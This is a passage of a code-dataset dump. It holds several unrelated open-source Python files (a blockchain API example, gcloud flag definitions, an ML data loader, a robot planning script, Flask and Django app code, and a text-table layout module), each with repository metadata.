BlockchainNetwork.EthereumNetwork.ROPSTEN\n\nBLOCKCHAIN_API_RESOURCE = BlockchainAPIResource(\n api_key_id=MY_API_KEY_ID,\n api_secret_key=MY_API_SECRET_KEY,\n blockchain=BLOCKCHAIN,\n network=NETWORK\n)\n\n\ndef example():\n try:\n assert MY_API_KEY_ID is not None\n assert MY_API_SECRET_KEY is not None\n except AssertionError:\n raise Exception(\"Fill in your key ID pair!\")\n\n if BLOCKCHAIN.value == Blockchain.SOLANA.value:\n # This is the transaction signature for a transaction that lists an NFT on SolSea.\n # From `mainnet-beta`\n tx_id = \"5H7o5YND5X7q4RgtKpmawqR9S7WuUwdnzj2uA5B7vCUvvVQVgNzk1CgMyH3duDXsapCcNgKufAeMZrijWaThCj9T\"\n else:\n # From `ropsten`\n tx_id = '0x2e81c50888bb80f763fb52870240fdad2fa87a8e95c8c729367c9f145fb85b59'\n\n transaction_info = BLOCKCHAIN_API_RESOURCE.get_transaction(transaction_blockchain_identifier=tx_id)\n\n print(json.dumps(transaction_info, indent=4, sort_keys=True))\n\n\nif __name__ == '__main__':\n example()\n","repo_name":"BL0CK-X/blockchain-api","sub_path":"examples/transaction/get-transaction/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"14058104571","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom googlecloudsdk.calliope import base\n\nDESCRIPTION_FLAG = base.Argument(\n '--description',\n help=\"\"\"\n The text that will be used to describe a notification configuration.\"\"\",\n)\n\n# Note:\n# SCC's custom --filter is passing the streaming config filter as part of\n# the request body. However --filter is a global filter flag in gcloud. The\n# --filter flag in gcloud (outside of this command) is used for client side\n# filtering. This has led to a collision in logic as gcloud believes the\n# update is trying to perform client side filtering. In the context of\n# notifications, it is instead updating the streaming config filter.\n#\n# Any future new commands should reconsider not using --filter for this logic\n# and perhaps use a different name to avoid any collisions with gcloud logic.\nFILTER_FLAG = base.Argument(\n '--filter',\n help=\"\"\"\n Filter to be used for notification config.\n \"\"\",\n)\n\nFILTER_FLAG_LONG_DESCRIPTION = base.Argument(\n '--filter',\n help=\"\"\"\n The filter string which will applied to events of findings of a\n notification configuration.\n \"\"\",\n)\n\nPAGE_TOKEN_FLAG = base.Argument(\n '--page-token',\n help=\"\"\"\n Response objects will return a non-null value for page-token to\n indicate that there is at least one additional page of data. User can\n either directly request that page by specifying the page-token\n explicitly or let gcloud fetch one-page-at-a-time.\"\"\",\n)\n\nPUBSUB_TOPIC_OPTIONAL_FLAG = base.Argument(\n '--pubsub-topic',\n help=\"\"\"\n The Pub/Sub topic which will receive notifications. Its format is\n \"projects/[project_id]/topics/[topic]\".\n \"\"\",\n)\n\nPUBSUB_TOPIC_REQUIRED_FLAG = base.Argument(\n '--pubsub-topic',\n required=True,\n help=\"\"\"\n The Pub/Sub topic which will receive notifications. Its format is\n \"projects/[project_id]/topics/[topic]\".\n \"\"\",\n)\n\n\ndef AddNotificationConfigPositionalArgument(parser):\n \"\"\"Add Notification Config as a positional argument.\"\"\"\n parser.add_argument(\n 'NOTIFICATIONCONFIGID',\n metavar='NOTIFICATION_CONFIG_ID',\n help=\"\"\"\\\n The ID of the notification config. Formatted as\n \"organizations/123/notificationConfigs/456\" or just \"456\".\n \"\"\",\n )\n return parser\n\n\ndef AddParentGroup(parser):\n \"\"\"Set folder/org/project as mutually exclusive group.\"\"\"\n resource_group = parser.add_group(required=False, mutex=True)\n resource_group.add_argument(\n '--organization',\n help=\"\"\"\\\n Organization where the notification config resides. Formatted as\n ``organizations/123'' or just ``123''.\n \"\"\",\n )\n resource_group.add_argument(\n '--folder',\n help=\"\"\"\\\n Folder where the notification config resides. Formatted as\n ``folders/456'' or just ``456''.\n \"\"\",\n )\n resource_group.add_argument(\n '--project',\n help=\"\"\"\\\n Project (ID or number) where the notification config resides.\n Formatted as ``projects/789'' or just ``789''.\n \"\"\",\n )\n return parser\n","repo_name":"Flank/gcloud_cli","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/scc/notifications/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40581805675","text":"from typing import Tuple, List, Optional\nimport logging\nimport os\nimport json\nfrom tqdm import tqdm\nfrom dataclasses import dataclass\nfrom functools import partial\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import PreTrainedTokenizerFast\n\nfrom utils import load_pickle, save_pickle, multiprocess_func, read_file\nfrom parser.input_utils import prepare_model_inputs\n\n\n@dataclass\nclass Example(object):\n code: str\n label_idx: int\n label_txt: str\n\n\n@dataclass\nclass InputFeature(object):\n input_ids: torch.Tensor # [T]\n all_bb_encoder_input_ids: torch.Tensor # [max_num_bbs, T]\n cfg_matrix: torch.Tensor # [num_bbs, num_bbs]\n dfg_matrix: torch.Tensor # [num_vars, num_vars]\n bb_var_matrix: torch.Tensor # [num_bbs, num_vars]\n labels: torch.Tensor\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, features):\n super().__init__()\n self.features = features\n\n def __getitem__(self, item):\n # return_dict = self.features[item].__dict__\n # print({k: v.size() for k, v in return_dict.items()})\n return self.features[item].__dict__\n\n def __len__(self):\n return len(self.features)\n\n\ndef prepare_dataset(\n args, tokenizer, cfg_vocab, dfg_vocab, split\n) -> Tuple[ClassificationDataset, List[Example]]:\n # check split\n assert split in [\"train\", \"valid\", \"test\"]\n dataset_dir = os.path.join(args.dataset_root, \"POJ-104\")\n logging.info(f\"Start preparing {split} data...\")\n\n # load examples\n dataset_cache_path = os.path.join(\n dataset_dir, \"cache\", f\"{args.task}-{split}-dataset.pk\"\n )\n examples_cache_path = os.path.join(\n dataset_dir, \"cache\", f\"{args.task}-{split}-examples.pk\"\n )\n if args.use_data_cache and os.path.exists(examples_cache_path):\n # load parsed examples from cache\n logging.info(f\"Find cache of examples: {examples_cache_path}\")\n examples = load_pickle(examples_cache_path)\n assert isinstance(examples, list)\n assert isinstance(examples[0], Example)\n logging.info(f\"Examples are loaded from cache\")\n else:\n # load and parse examples from disk files\n logging.info(\"Start loading split metadata...\")\n with open(\n os.path.join(dataset_dir, f\"{split}.jsonl\"), mode=\"r\", encoding=\"utf-8\"\n ) as f:\n lines = f.readlines()\n\n code_dir = os.path.join(dataset_dir, \"optimized\")\n logging.info(\"Start loading data...\")\n examples = []\n # lines = lines[:20]\n for line in tqdm(lines, ascii=True):\n data = json.loads(line)\n code_path = os.path.join(\n code_dir, data[\"label\"], f\"{data['solution_id']}-Os-ffast-math.ll\"\n )\n if os.path.exists(code_path):\n code = read_file(code_path)\n examples.append(\n Example(\n code=code,\n label_idx=int(data[\"label\"]) - 1,\n label_txt=data[\"label\"],\n )\n )\n # save as cache if needed\n if args.use_data_cache:\n save_pickle(obj=examples, path=examples_cache_path)\n\n # load dataset\n if args.use_data_cache and os.path.exists(dataset_cache_path):\n # load parsed dataset from cache\n logging.info(f\"Find cache of dataset: {dataset_cache_path}\")\n dataset = load_pickle(dataset_cache_path)\n assert isinstance(dataset, ClassificationDataset)\n logging.info(f\"Dataset is loaded from cache\")\n else:\n # build dataset from examples\n logging.info(\"Start parsing and tokenizing...\")\n features = convert_examples_to_features(\n args=args,\n examples=examples,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n\n dataset = ClassificationDataset(features)\n\n if args.use_data_cache:\n save_pickle(obj=dataset, path=dataset_cache_path)\n\n return dataset, examples\n\n\ndef encode_example(example, args, tokenizer, cfg_vocab, dfg_vocab):\n model_inputs = prepare_model_inputs(\n args=args,\n ir_content=example.code,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n if model_inputs is None:\n return None\n\n input_feature = InputFeature(\n input_ids=torch.tensor(model_inputs[\"input_ids\"], dtype=torch.int),\n all_bb_encoder_input_ids=torch.tensor(model_inputs[\"all_bb_encoder_input_ids\"], dtype=torch.int),\n cfg_matrix=torch.tensor(model_inputs[\"cfg_matrix\"], dtype=torch.int),\n dfg_matrix=torch.tensor(model_inputs[\"dfg_matrix\"], dtype=torch.int),\n bb_var_matrix=torch.tensor(model_inputs[\"bb_var_matrix\"], dtype=torch.int),\n labels=torch.tensor([example.label_idx], dtype=torch.long)\n )\n\n return input_feature\n\n\ndef convert_examples_to_features(\n args,\n examples: List[Example],\n tokenizer: PreTrainedTokenizerFast,\n cfg_vocab: dict,\n dfg_vocab: dict,\n) -> List[Optional[InputFeature]]:\n encode_func = partial(\n encode_example,\n args=args,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n\n features = multiprocess_func(encode_func, examples, single_thread=args.single_thread_parsing)\n features = [feature for feature in features if feature is not None]\n\n return features\n","repo_name":"NougatCA/FAIR","sub_path":"src/tasks/classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72722845867","text":"import logging, argparse\nfrom pog.graph.graph import Graph\nfrom pog.planning.planner import test, Searcher\nfrom pog.planning.problem import PlanningOnGraphProblem\nfrom pog.planning.utils import *\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-viewer',\n action='store_true',\n help='Enable the viewer and visualizes the plan')\n args = parser.parse_args()\n print('Arguments:', args)\n\n logFormatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s] [%(levelname)-5.5s] %(message)s\"\n )\n rootLogger = logging.getLogger()\n\n fileHandler = logging.FileHandler(\"pog_example/iros_2022_exp/exp2/test.log\")\n fileHandler.setFormatter(logFormatter)\n rootLogger.addHandler(fileHandler)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n rootLogger.addHandler(consoleHandler)\n\n rootLogger.setLevel(logging.INFO)\n\n # Planning\n g_start = Graph('exp2-init', file_dir='pog_example/iros_2022_exp/exp2/', file_name='init.json')\n g_goal = Graph('exp2-goal', file_dir='pog_example/iros_2022_exp/exp2/', file_name='goal.json')\n \n # Environment(g_goal)\n path = test(Searcher, problem=PlanningOnGraphProblem(g_start, g_goal, parking_place=99))\n \n action_seq = path_to_action_sequence(path) \n apply_action_sequence_to_graph(g_start, g_goal, action_seq, visualize=args.viewer)\n","repo_name":"zyjiao4728/POG-Demo","sub_path":"pog_example/iros_2022_exp/exp2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19210143618","text":"from flask import render_template, request, redirect, url_for\r\nfrom app import app\r\nfrom app.models.cards import CardsModel\r\nimport os\r\nfrom pprint import pprint\r\n\r\napp.config[\"UPLOAD_FOLDER\"] = \"./app/static\"\r\n\r\nclass Cards:\r\n def index() -> str:\r\n lutadores = CardsModel.listar_todos()\r\n return render_template('cards/index.html', lutadores=lutadores)\r\n\r\n def novo() -> str:\r\n return render_template('cards/novo.html')\r\n\r\n def salvar() -> str:\r\n foto = request.files[\"foto\"]\r\n data = {\r\n 'nome': request.form['nome'],\r\n 'idade': request.form['idade'],\r\n 'forca': request.form['forca'],\r\n 'foto': foto.filename\r\n }\r\n \r\n if CardsModel.salvar(data):\r\n path = os.path.join(app.config[\"UPLOAD_FOLDER\"], foto.filename)\r\n foto.save(path)\r\n return redirect(url_for('index'))\r\n return 'erro ao salvar'\r\n\r\n def editar(id) -> str:\r\n lutador = CardsModel.listar_um(id)\r\n return render_template('cards/editar.html', lutador=lutador)\r\n\r\n def atualizar(id) -> str:\r\n foto = request.files[\"foto\"]\r\n \r\n data = {\r\n 'nome': request.form['nome'],\r\n 'idade': request.form['idade'],\r\n 'forca': request.form['forca'],\r\n 'foto': foto.filename\r\n }\r\n\r\n if CardsModel.atualizar(id, data):\r\n return redirect(url_for('index'))\r\n\r\n return 'houve um erro'\r\n \r\n def deletar(id) -> str:\r\n if CardsModel.deletar(id):\r\n return redirect(url_for('index'))\r\n\r\n return 'houve um erro'\r\n","repo_name":"jonribeiro23/flask-dbz","sub_path":"app/controllers/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22981477881","text":"\nfrom Ceasefires.models import *\nimport pandas as pd\nfrom datetime import datetime\n\nfrom typing import Dict\n\nimport re\n\nimport logging\n\ndef replaceData(data: Dict[str,pd.DataFrame]):\n\n for m in [Region,Country,Ceasefire,Actor,Declaration]:\n m.objects.all().delete()\n\n try:\n R = Region.objects.get(code = -1)\n except Region.DoesNotExist:\n R = Region.objects.create(\n code = -1,\n name = \"dud\"\n )\n\n for idx,row in data[\"countries\"].iterrows():\n Country.objects.create(\n code = row.cc,\n region = R,\n name = row.location\n )\n\n for idx,row in data[\"ceasefires\"].iterrows():\n year = row.cf_effect_yr if not row.cf_effect_yr in [-1,0] else None \n month = row.cf_effect_month if not row.cf_effect_month in [-1,0] else 6\n day = row.cf_effect_day if not row.cf_effect_day in [-1,0] else 15 \n \n try:\n d = datetime.strptime(f\"{year}-{month}-{day}\",\n \"%Y-%m-%d\")\n except ValueError:\n d = None\n\n ctry = Country.objects.get(code=row.cc)\n cf = Ceasefire.objects.create(\n code = row.uniq_id,\n country = ctry,\n effect_date = d,\n )\n\n for idx,row in data[\"actors\"].iterrows():\n Actor.objects.create(\n code = row.acid,\n ucdp_code = row.ucdp_actor_id,\n name = row.actor_name\n )\n\n for idx,row in data[\"declarations\"].iterrows():\n #row[\"acid\"] = row[\"actor_name\"] + \"@\" + str(row[\"cc\"])\n\n default = lambda x: x if x not in [-1,0] else None\n year,month,day = [default(v) for v in [row.cf_dec_yr, row.cf_dec_month, row.cf_dec_day]]\n\n month = month if month else 6\n day = day if day else 15\n\n try:\n date = datetime.strptime(f\"{year}-{month}-{day}\",\n \"%Y-%m-%d\")\n except ValueError:\n continue\n else:\n Declaration.objects.create(\n ceasefire = Ceasefire.objects.get(code=row.uniq_id),\n #country = Country.objects.get(code=row.cc),\n actor = Actor.objects.get(code=row.acid),\n dec_date = date\n )\n","repo_name":"Peder2911/cfapi","sub_path":"Ceasefires/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23697187445","text":"from textwrap import TextWrapper\nfrom itertools import zip_longest\nimport math\nfrom operator import attrgetter\nfrom statistics import mean, median\nfrom sys import stdout\nfrom datetime import datetime\n\n\nclass Cell():\n def __init__(self, value, colindex=None, rowindex=None, spacing=None, just=None, split=None,\n print_width=None, noprint=False, label=None, initial_indent=''):\n self.value = value\n\n if self.value is None:\n self.text = ''\n elif isinstance(value, str):\n self.text = self.value\n else:\n self.text = str(self.value)\n\n self.spacing = spacing\n self.just = just if just is not None else '<'\n self.split = split\n self.noprint = noprint if noprint is not None else False\n self._print_width = print_width\n self.colindex = colindex\n self.rowindex = rowindex\n self.label = label\n self.initial_indent = initial_indent\n\n def __repr__(self):\n return self.text\n\n def __eq__(self, other):\n if self.value == other.value and self.rowindex == other.rowindex and self.colindex == other.colindex:\n return True\n else:\n return False\n\n def __lt__(self, other):\n if self.rowindex < other.rowindex:\n return True\n else:\n return False\n\n def __hash__(self):\n return hash((self.value, self.rowindex, self.colindex))\n\n def __mul__(self, other):\n return tuple(self for i in range(other))\n\n @property\n def content_width(self):\n if self.split is None:\n return len(self.initial_indent + self.text)\n else:\n return max(len(part) for part in (self.initial_indent + self.text).split(self.split))\n\n @property\n def print_width(self):\n return self._print_width if self._print_width is not None else self.content_width\n\n @print_width.setter\n def print_width(self, new_print_width):\n self._print_width = new_print_width\n\n @property\n def wrapped_text(self):\n wrapper = TextWrapper(width=self.print_width, initial_indent=self.initial_indent)\n\n if self.text.isspace():\n wrapped_text = [' ']\n elif self.split is None:\n wrapped_text = wrapper.wrap(self.text)\n else:\n parts = self.text.split(self.split)\n wrapped_text = []\n for part in parts:\n wrapped_text = wrapped_text + wrapper.wrap(part)\n\n return wrapped_text\n\n @property\n def max_lines(self):\n return len(self.wrapped_text)\n\n def write_line(self, lineno, file):\n spacing = self.spacing if self.spacing is not None else 0\n wrapped_text = self.wrapped_text\n\n if 0<= lineno < len(wrapped_text):\n text = wrapped_text[lineno]\n file.write(f\"{' ' * spacing}{text:{self.just}{self.print_width}}\")\n else:\n file.write(f\"{' ' * spacing}{' ' * self.print_width}\")\n\n def write(self, file):\n for i in range(self.max_lines):\n self.write_line(i, file)\n file.write('\\n')\n\n\n# test = Column([\"This is no a test\", \"This is a test\"])\n# print(test.pref_width)\n\nclass Cells:\n def __init__(self, *cells):\n self.cells = cells\n self.table = self._tabulate()\n\n def _tabulate(self):\n table = {}\n for cell in self.cells:\n if cell.colindex in table:\n table[cell.colindex][cell.rowindex] = table[cell.colindex].get(cell.rowindex, tuple()) + (cell,)\n else:\n table[cell.colindex] = {}\n table[cell.colindex][cell.rowindex] = (cell,)\n\n return table\n\n def set_cell_width(self, width):\n for cell in self.cells:\n if cell.colindex in width:\n cell.print_width = width[cell.colindex]\n\n return self\n\n def _sortedrowindices(self):\n return sorted(tuple(set(cell.rowindex for cell in self.cells)))\n\n def _getrow(self, rowindex, *colindices, width, spacing):\n row = ()\n for colindex in colindices:\n row = row + self.table[colindex].get(rowindex, (Cell(None, print_width=width[colindex], spacing=spacing[colindex]),))\n\n return Row(*row)\n\n def _getrowlabels(self, row):\n labels = tuple()\n for cell in row.cells:\n if cell.label is not None:\n for i, label in enumerate(cell.label):\n if i < len(labels) and label != labels[i]:\n labels = labels + (label,)\n elif i >= len(labels):\n labels = labels + (label,)\n\n return labels\n\n def _make_rowlabel(self, previous_row_label, current_row_label):\n j = 0\n for i in range(len(current_row_label)):\n if i < len(previous_row_label):\n if current_row_label[i] != previous_row_label[i]:\n j = i\n break\n\n return j\n\n def getrowgroup(self, *colindices, width, spacing):\n for i, rowindex in enumerate(self._sortedrowindices()):\n current_row = self._getrow(rowindex, *colindices, width=width, spacing=spacing)\n current_row_label = self._getrowlabels(current_row)\n\n if i == 0:\n differ_at = 0\n rows = (current_row,)\n previous_row_label = current_row_label\n else:\n if previous_row_label == current_row_label:\n rows = rows + (current_row,)\n else:\n yield RowGroup(*rows, rowlabel=RowLabel(*previous_row_label, print_index=differ_at))\n differ_at = self._make_rowlabel(previous_row_label, current_row_label)\n rows = (current_row,)\n previous_row_label = current_row_label\n\n yield RowGroup(*rows, rowlabel=RowLabel(*previous_row_label, print_index=differ_at))\n\n\nclass Columns(Cells):\n def __init__(self, *cells, colorder=tuple(), idcols=tuple(), maxwidth=math.inf, minwidth=1, spacing=0, split='~',\n wrap=True,\n wrap_header=True, orderby=None, label=None, just='<', header_just=None):\n Cells.__init__(self, *cells)\n self._columns = self.columns = self.cells\n self._rows = self.rows = self.cells\n self.colorder = colorder\n self.idcols = idcols\n self._maxwidth = self.maxwidth = maxwidth\n self._minwidth = self.minwidth = minwidth\n self._spacing = self.spacing = spacing\n self._wrap = self.wrap = wrap\n self._wrap_header = self.wrap_header = wrap_header\n self._label = self.label = label\n self._just = self.just = just\n self._header_just = self.header_just = header_just\n self.split = split if split is not None else '~'\n self.pages = {0: self.colorder}\n\n for cell in self.cells:\n cell.spacing = self.spacing.get(cell.colindex, 0)\n cell.just = self.just.get(cell.colindex, '<')\n cell.split = self.split\n\n self.width = {0: {}}\n for column in self.colorder:\n self.width[0][column] = self.get_pref_width(column)\n\n def set_width(self, pageindex, column, value):\n self.width[pageindex][column] = value\n\n @property\n def columns(self):\n return self._columns\n\n @columns.setter\n def columns(self, cells):\n self._columns = {}\n for cell in cells:\n if cell.colindex in self._columns:\n self._columns[cell.colindex] = self._columns[cell.colindex] + (cell,)\n else:\n self._columns[cell.colindex] = (cell,)\n\n def set_property(self, value, default):\n if isinstance(value, dict):\n prop = value\n for column in self.colorder:\n if column not in prop:\n prop[column] = default\n elif prop[column] is None:\n prop[column] = default\n elif isinstance(value, (list, tuple)):\n prop = {}\n for i, column in enumerate(self.colorder):\n if value[i] is not None:\n prop[column] = value[i]\n else:\n prop[column] = default\n else:\n prop = {}\n if value is not None:\n for column in self.colorder:\n prop[column] = value\n else:\n for column in self.colorder:\n prop[column] = default\n\n return prop\n\n @property\n def maxwidth(self):\n return self._maxwidth\n\n @maxwidth.setter\n def maxwidth(self, value):\n self._maxwidth = self.set_property(value, math.inf)\n\n @property\n def minwidth(self):\n return self._minwidth\n\n @minwidth.setter\n def minwidth(self, value):\n self._minwidth = self.set_property(value, 1)\n\n @property\n def spacing(self):\n return self._spacing\n\n @spacing.setter\n def spacing(self, value):\n self._spacing = self.set_property(value, 0)\n\n @property\n def wrap(self):\n return self._wrap\n\n @wrap.setter\n def wrap(self, value):\n self._wrap = self.set_property(value, True)\n\n @property\n def wrap_header(self):\n return self._wrap_header\n\n @wrap_header.setter\n def wrap_header(self, value):\n self._wrap_header = self.set_property(value, True)\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, value):\n self._label = self.set_property(value, '')\n\n @property\n def just(self):\n return self._just\n\n @just.setter\n def just(self, value):\n self._just = self.set_property(value, '<')\n\n @property\n def header_just(self):\n return self._header_just\n\n @header_just.setter\n def header_just(self, value):\n if isinstance(value, dict):\n self._header_just = value\n for column in self.colorder:\n if column not in self._header_just:\n self._header_just[column] = self.just[column]\n elif self._header_just[column] is None:\n self._header_just[column] = self.just[column]\n elif isinstance(value, (list, tuple)):\n self._header_just = {}\n for i, column in enumerate(self.colorder):\n if value[i] is not None:\n self._header_just[column] = value[i]\n else:\n self._header_just[column] = self.just[column]\n else:\n self._header_just = {}\n if value is not None:\n for column in self.colorder:\n self._header_just[column] = value\n else:\n for column in self.colorder:\n self._header_just[column] = self.just[column]\n\n def get_max_content_width(self, column):\n return max(cell.content_width for cell in self.columns[column])\n\n def get_avg_content_width(self, column):\n return mean(cell.content_width for cell in self.columns[column])\n\n def get_pref_min_width(self, column):\n if not self.wrap[column]:\n if not self.wrap_header[column]:\n return max(self.minwidth[column], self.get_max_content_width(column),\n *(len(string) for string in self.label[column].split(self.split)))\n else:\n return max(self.minwidth[column], self.get_max_content_width(column))\n else:\n if not self.wrap_header[column]:\n return max(self.minwidth[column], *(len(string) for string in self.label[column].split(self.split)))\n else:\n return self.minwidth[column]\n\n def get_pref_width(self, column):\n return min(self.maxwidth[column], max(self.get_max_content_width(column), self.get_pref_min_width(column)))\n\n def recurse(self, cols, linesize, depth):\n for i, columns in enumerate(cols):\n pageindex = i + depth if depth > 0 else i\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n if tot_used_width < linesize:\n remain_width = linesize - tot_used_width\n while remain_width > 0 and any(\n self.width[pageindex][column] < self.maxwidth[column] for column in columns):\n tot_max_content_width = sum(\n self.get_max_content_width(column) for column in columns if\n self.width[pageindex][column] < self.maxwidth[column])\n tot_avg_content_width = sum(\n self.get_avg_content_width(column) for column in columns if\n self.width[pageindex][column] < self.maxwidth[column])\n for column in columns:\n if self.width[pageindex][column] < self.maxwidth[column]:\n width_ratio = math.ceil(\n remain_width * (self.get_avg_content_width(column) / tot_avg_content_width))\n # width_ratio = math.ceil(\n # remain_width * (self.get_max_content_width(column) / tot_max_content_width))\n self.set_width(pageindex, column, max(min(self.width[pageindex][column] + width_ratio\n , self.maxwidth[column]\n , self.get_pref_width(column) if any(\n self.width[pageindex][column] < self.get_pref_width(column) for column in\n columns) else\n self.maxwidth[column]\n , self.width[pageindex][column] + linesize - sum(\n [self.width[pageindex][column] + self.spacing[column] for column in columns])\n , linesize - self.spacing[column]),\n self.get_pref_min_width(column)))\n\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n remain_width = linesize - tot_used_width\n\n if tot_used_width > linesize:\n excess_width = tot_used_width - linesize\n while excess_width > 0 and any(\n self.width[pageindex][column] > self.get_pref_min_width(column) for column in columns):\n tot_max_content_width = sum(\n self.get_max_content_width(column) for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column))\n tot_avg_content_width = sum(\n self.get_avg_content_width(column) for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column))\n wgt_divisor = len(\n [column for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column)]) - 1\n for i, column in enumerate(columns):\n if self.width[pageindex][column] > self.get_pref_min_width(column):\n # print(tot_max_content_width, self.get_max_content_width(column), wgt_divisor)\n # if wgt_divisor > 0:\n # width_ratio = math.ceil(\n # excess_width * ((\n # tot_max_content_width - self.get_max_content_width(column)) / tot_max_content_width) / wgt_divisor)\n # else:\n # width_ratio = excess_width\n # width_ratio = math.ceil(\n # excess_width * (self.get_max_content_width(column) / tot_max_content_width))\n width_ratio = math.ceil(\n excess_width * (self.get_avg_content_width(column) / tot_avg_content_width))\n self.set_width(pageindex, column,\n min(max(self.width[pageindex][column] - width_ratio,\n self.width[pageindex][column] - excess_width,\n self.width[pageindex][column] + linesize - sum(\n [self.width[pageindex][column] + self.spacing[column] for column\n in\n columns]),\n self.get_pref_min_width(column),\n self.get_pref_width(column) if any(\n self.width[pageindex][column] > self.get_pref_width(column) for\n column in\n columns) else self.get_pref_min_width(column)),\n linesize - self.spacing[column], self.maxwidth[column]))\n\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n excess_width = tot_used_width - linesize\n\n if excess_width > 0:\n cols1 = columns\n cols2 = tuple()\n\n while excess_width > 0:\n cols2 = (cols1[-1],) + cols2\n cols1 = cols1[:-1]\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in cols1])\n excess_width = tot_used_width - linesize\n\n maxkey = max(self.pages.keys())\n self.pages[maxkey] = cols1\n self.pages[maxkey + 1] = self.idcols + cols2\n\n self.width[maxkey + 1] = {}\n for column in self.idcols + cols2:\n self.width[maxkey + 1][column] = self.get_pref_width(column)\n self.recurse([cols1, self.idcols + cols2], linesize=linesize, depth=depth + 1)\n return\n\n def calculate_width(self, linesize):\n self.recurse([self.colorder], linesize=linesize, depth=-1)\n return self\n\n # def get_rows(self, pageindex):\n # rows = {}\n # for column in self.pages[pageindex]:\n # for cell in self.columns[column]:\n # cell.print_width = self.width[pageindex][column]\n # if column in rows:\n # rows[column][cell.rowindex] = rows[column].get(cell.rowindex, tuple()) + (cell,)\n # else:\n # rows[column] = {}\n # rows[column][cell.rowindex] = rows[column].get(cell.rowindex, tuple()) + (cell,)\n #\n # #return (Row(*row) for row in zip_longest(*(self.columns[column] for column in self.pages[pageindex])))\n #\n # rowindices = sorted(tuple(set(cell.rowindex for cell in self.cells)))\n #\n # prevlabel = tuple()\n # for index in rowindices:\n # row = tuple()\n # for column in self.pages[pageindex]:\n # row = row + rows[column].get(index, (Cell(None, print_width=self.width[pageindex][column]),))\n #\n # rowlabel = tuple()\n # for cell in row:\n # if cell.label is not None:\n # for label in cell.label:\n # if label not in rowlabel:\n # rowlabel = rowlabel + (label,)\n #\n # if prevlabel != rowlabel:\n # j = 0\n # for i in range(len(rowlabel)):\n # if i < len(prevlabel):\n # if rowlabel[i] != prevlabel[i]:\n # j = i\n # break\n #\n # yield Row(Cell(' ', print_width=1))\n # for i in range(j, len(rowlabel)):\n # yield Row(Cell(rowlabel[i], initial_indent=i*' '))\n #\n # yield Row(*row)\n # prevlabel = rowlabel\n\n def get_header_row(self, pageindex):\n header = tuple()\n\n for column in self.pages[pageindex]:\n label = Cell(self.label[column], print_width=self.width[pageindex][column],\n spacing=self.spacing[column], split=self.split, just=self.header_just[column])\n header = header + (label,)\n\n return Row(*header)\n\n\nclass Row():\n def __init__(self, *cells):\n self.cells = cells\n\n @property\n def max_lines(self):\n return max(cell.max_lines for cell in self.cells)\n\n def __repr__(self):\n return self.cells.__repr__()\n\n def write(self, file, align_bottom=False):\n for i in range(self.max_lines):\n for cell in self.cells:\n if align_bottom:\n if self.max_lines == cell.max_lines:\n cell.write_line(i, file)\n else:\n cell.write_line(i - cell.max_lines, file)\n else:\n cell.write_line(i, file)\n\n file.write('\\n')\n\n\nclass RowLabel():\n def __init__(self, *labels, print_index=0):\n self._labels = labels\n self.print_index = print_index\n\n def __repr__(self):\n self.labels.__repr__()\n\n @property\n def labels(self):\n return (Cell(label, print_width=90) for label in self._labels)\n\n @labels.setter\n def labels(self, value):\n self._labels = tuple(value)\n\n @property\n def max_lines(self):\n return sum(label.max_lines for i, label in enumerate(self.labels) if i >= self.print_index)\n\n def write(self, file):\n for i, label in enumerate(self.labels):\n if i >= self.print_index:\n label.initial_indent = i*' '\n label.write(file)\n\n # file.write('\\n')\n\n\nclass RowGroup:\n def __init__(self, *rows, rowlabel):\n self.rows = rows\n self.rowlabel = rowlabel\n\n @property\n def max_lines(self):\n return sum(row.max_lines for row in self.rows) + self.rowlabel.max_lines\n\n# import lorem\n# testcells = ()\n# for column in ('a','b','c'):\n# for row in range(10):\n# testcells = testcells + (Cell(lorem.sentence(), colindex=column, rowindex=row),)\n#\n# testcolumn=Columns(*testcells, colorder=('a','b','c'), linesize=145, wrap=True, minwidth=40).calculate_width()\n# print(testcolumn.pages)\n","repo_name":"satish-ghadigaonkar/report","sub_path":"src/Column.py","file_name":"Column.py","file_ext":"py","file_size_in_byte":22936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7844635376","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name='index'),\n path(\"index\", views.index, 